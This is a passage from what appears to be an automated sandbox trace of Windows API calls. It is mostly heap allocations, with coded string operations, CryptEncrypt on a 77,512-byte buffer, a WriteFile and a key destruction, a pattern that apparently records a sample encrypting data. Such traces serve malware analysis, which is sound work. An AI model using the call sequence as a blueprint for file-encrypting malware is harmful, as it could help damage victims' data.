hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0208.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74040 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0208.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0208.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0208.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0208.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0208.293] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaabb8 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74088 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0208.293] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0208.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0208.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0208.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0208.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0208.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0208.295] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0208.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaacd8 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.296] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d2f10 | out: hHeap=0x2af0000) returned 1 [0208.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0208.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0208.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0208.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaaeb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.300] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x12ec0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x12ec8) returned 1 [0208.300] CharLowerBuffW (in: lpsz="byte[77512]", cchLength=0xb | out: lpsz="byte[77512]") returned 0xb [0208.301] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.301] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.302] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d2f10*, pdwDataLen=0x8cef60*=0x12ec0, dwBufLen=0x12ec8 | out: pbData=0x37d2f10*, pdwDataLen=0x8cef60*=0x12ec8) returned 1 [0208.304] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.304] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.304] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.305] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.305] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.305] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.319] WriteFile (in: hFile=0x510, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x12ec8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x12ec8, lpOverlapped=0x0) returned 1 [0208.323] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0208.323] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0208.323] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.324] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.324] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaad80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0208.324] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0208.324] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.324] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.324] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.324] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.324] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.324] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.324] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.324] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.324] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.324] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.324] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.324] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.324] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.324] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.325] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.325] CharUpperBuffW (in: 